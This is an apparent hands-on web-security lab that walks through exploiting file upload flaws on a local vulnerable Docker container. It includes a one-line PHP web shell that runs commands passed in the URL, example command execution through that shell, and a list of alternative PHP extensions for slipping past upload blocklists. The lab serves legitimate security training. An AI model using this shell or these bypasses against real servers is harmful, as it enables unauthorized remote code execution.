Exploit File Upload Vulnerabilities with Nmap

NmapNmapBeginner
Practice Now

Introduction

This lab focuses on file upload vulnerabilities, a common security issue in web applications. You will learn how to identify these vulnerabilities, understand their potential impact, and explore methods to exploit them. The lab provides hands-on experience with practical examples, enabling you to better understand web application security concepts and defensive measures.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/firewall_evasion("Firewall Evasion Techniques") subgraph Lab Skills nmap/firewall_evasion -.-> lab-416154{{"Exploit File Upload Vulnerabilities with Nmap"}} end

Understanding File Upload Vulnerabilities

File upload vulnerabilities occur when web applications fail to properly validate uploaded files. This can allow attackers to upload malicious files, potentially leading to remote code execution on the server.

Let's examine a typical file upload implementation in PHP using the move_uploaded_file() function:

<?php
// The move_uploaded_file() function moves an uploaded file to a new location
// Returns true on success, false on failure
move_uploaded_file($file, $newloc);

Parameters:

  • $file: The uploaded file to move
  • $newloc: The destination path for the file

A secure implementation should include proper validation, as shown in this example:

<?php
// Define allowed image extensions
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);        // Get the file extension

if ((($_FILES["file"]["type"] == "image/gif")
    || ($_FILES["file"]["type"] == "image/jpeg")
    || ($_FILES["file"]["type"] == "image/jpg")
    || ($_FILES["file"]["type"] == "image/pjpeg")
    || ($_FILES["file"]["type"] == "image/x-png")
    || ($_FILES["file"]["type"] == "image/png"))
    && ($_FILES["file"]["size"] < 204800)    // Less than 200 KB
    && in_array($extension, $allowedExts))
{
    if ($_FILES["file"]["error"] > 0)
    {
        echo "Error: " . $_FILES["file"]["error"] . "<br>";
    }
    else
    {
        echo "Uploaded file name: " . $_FILES["file"]["name"] . "<br>";
        echo "File type: " . $_FILES["file"]["type"] . "<br>";
        echo "File size: " . ($_FILES["file"]["size"] / 1024) . " KB<br>";
        echo "Temporary file location: " . $_FILES["file"]["tmp_name"];
    }
}
else
{
    echo "Invalid file format";
}
?>

This code demonstrates several important security checks:

  • File extension validation
  • MIME type verification
  • File size limitation
  • Error handling

Without these validations, attackers could potentially upload malicious files that execute on the server.

Identifying the Server-side Language

Before exploiting a file upload vulnerability, it's crucial to identify the server-side language used by the web application. This information determines which type of file to upload for successful exploitation.

First, let's set up our lab environment:

docker run -d -p 82:80 --name pentesterlab-WebforPentest-1 -it jewel591/vulnbox:pentesterlab-WebforPentest-1 /bin/sh -c 'service apache2 start && tail -f /var/log/apache2/error.log' --registry-mirror='https://registry.docker-cn.com' && docker exec pentesterlab-WebforPentest-1 chmod 777 /var/www/upload/images

After running this command, verify that the environment is accessible at: http://localhost:82

Methods to identify server-side language:

  1. URL File Extensions:

    • .php extensions indicate PHP
    • .asp or .aspx extensions indicate ASP.NET
    • .jsp extensions indicate Java Server Pages
  2. Server Headers:

    • Microsoft IIS typically runs ASP.NET
    • Apache or Nginx commonly run PHP
    • Apache Tomcat runs JSP

You can use the Wappalyzer browser extension to automatically detect the web server and programming language:

In our lab environment, you should see:

Web Server: Apache
Backend Language: PHP

Uploading a Web Shell

Now that we've identified PHP as the server-side language, we'll upload a PHP web shell to execute commands on the server.

A collection of web shells can be found here:

https://github.com/iSecurity-Club/Pentest-Methodologies/tree/master/web-exploit-exp/fileupload/php
  1. Create a test file phpinfo.php in the /home/labex/project directory:
<?php phpinfo(); ?>
  1. Upload the file:

    • Visit http://localhost:82/upload/example1.php
    • Select and upload your phpinfo.php file
  2. Verify the upload:

    • Access http://localhost:82/upload/images/phpinfo.php
    • You should see the PHP configuration information page
  3. Create a command execution shell shell.php:

<?php echo "Shell"; system($_GET['cmd']); ?>
  1. Upload and test the shell:

    • Upload shell.php using the same method
    • Access http://localhost:82/upload/images/shell.php
    • You may see a warning message (expected without parameters)
  2. Execute commands:

    • Check current user: http://localhost:82/upload/images/shell.php?cmd=whoami
      Expected output: www-data

    • List files and system info: http://localhost:82/upload/images/shell.php?cmd=ls;uname%20-a
      Expected output: Directory listing and system information

Note: This lab demonstrates basic web shell functionality. Advanced topics like reverse shells and privilege escalation are covered in more advanced courses.

Bypassing Server Restrictions (Optional)

Some web applications implement file extension restrictions to prevent malicious file uploads. This section explores methods to bypass these restrictions.

When .php extensions are blocked, try alternative PHP extensions that may be executable:

  1. Try uploading with .php3 extension:

    • Visit http://localhost:82/upload/example2.php
    • Upload phpinfo.php3
    • Access http://localhost:82/upload/images/phpinfo.php3
  2. If unsuccessful, try .phar extension:

    • Upload phpinfo.phar
    • Access http://localhost:82/upload/images/phpinfo.phar

Common bypass extensions to try:

  • .php3
  • .php4
  • .php5
  • .phar
  • .phtml

Note: Success depends on server configuration. Different servers may allow different extensions to execute as PHP code.

Summary

This lab covered essential aspects of file upload vulnerabilities:

Key Concepts:

  • Understanding file upload vulnerability mechanisms
  • Identifying server-side programming languages
  • Uploading and executing web shells
  • Bypassing file extension restrictions

Technical Skills Acquired:

  • Server-side language detection
  • Web shell creation and deployment
  • Command execution through uploaded files
  • Extension bypass techniques

Security Implications:

  • Impact of insufficient file validation
  • Importance of proper upload restrictions
  • Server-side execution risks

This foundational knowledge prepares you for advanced web application security topics covered in subsequent courses.